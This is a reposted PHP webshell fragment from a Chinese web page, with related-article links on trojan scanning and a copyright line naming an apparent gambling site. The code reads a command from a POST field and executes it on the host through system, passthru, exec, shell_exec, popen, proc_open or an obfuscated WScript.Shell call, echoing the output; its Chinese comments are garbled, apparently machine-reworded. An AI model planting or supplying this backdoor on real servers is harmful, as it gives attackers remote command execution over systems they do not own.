echo "<form action="?action=shell&dir=".urlencode($dir)."" method="POST">n";
if(isset($_POST['cmd'])) $cmd = $_POST['cmd'];
    $tb->tdbody('提醒:要是出口结果不完全,提出把出口结果写入文件.那样可以赢得任何内容. ');
    $tb->tdbody('proc_open函数假若不是私下认可的winnt系统请自行安装使用,自行修改记得写退出,不然会在主机上预留二个未截至的进度.');
    $tb->tdbody('proc_open函数要利用的cmd程序的职位:'.$tb->makeinput('cmd',$cmd,'','text','30').'(如果是linux系统依然大大们本人修改吧)');
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open'=>'proc_open');
$tb->tdbody('采纳实施函数: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' 输入指令: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit'));
?>
<tr class="secondalt">
<td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
    if (!empty($_POST['command'])) {
        if ($execfunc=="system") {
            system($_POST['command']);
        } elseif ($execfunc=="passthru") {
            passthru($_POST['command']);
        } elseif ($execfunc=="exec") {
            $result = exec($_POST['command']);
            echo $result;
        } elseif ($execfunc=="shell_exec") {
            $result=shell_exec($_POST['command']);
            echo $result;    
        } elseif ($execfunc=="popen") {
            $pp = popen($_POST['command'], 'r');
            $read = fread($pp, 2096);
            echo $read;
            pclose($pp);
        } elseif ($execfunc=="wscript") {
            $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
            $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
            $stdout = $exec->StdOut();
            $stroutput = $stdout->ReadAll();
            echo $stroutput;
        } elseif($execfunc=="proc_open"){
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open("".$_POST['cmd']."", $descriptorspec, $pipes);
if (is_resource($process)) {

// 写命令
fwrite($pipes[0], "".$_POST['command']."rn");
fwrite($pipes[0], "exitrn");
fclose($pipes[0]);
// 读取输出
while (!feof($pipes[1])) {
echo fgets($pipes[1], 1024);
}
fclose($pipes[1]);
while (!feof($pipes[2])) {
echo fgets($pipes[2], 1024);
}
fclose($pipes[2]);

proc_close($process);
}
        } else {
            system($_POST['command']);
        }
    }
    ?>

你可能感兴趣的小说:

  • php木马webshell扫描器代码
  • 确切查找PHP WEBSHELL木马校订版
  • 准确查找PHP WEBSHELL木马的艺术(1)
  • PHP Web木马扫描器代码分享
  • PHP Web木马扫描器代码 v1.0 安全测验工具
  • 一句话木马的规律及使用深入分析(asp,aspx,php,jsp)
  • php检验图片木马多进制编制程序实施
  • php网址被挂木马后的修复方法总结
  • PHP 木马攻击的守护设置方式
  • PHP完成webshell扫描文件木马的措施
TAG标签:
版权声明:本文由澳门新葡8455手机版发布于www.2527.com,转载请注明出处:【www.2527.com】木马的解析,webshell扫描后门木马实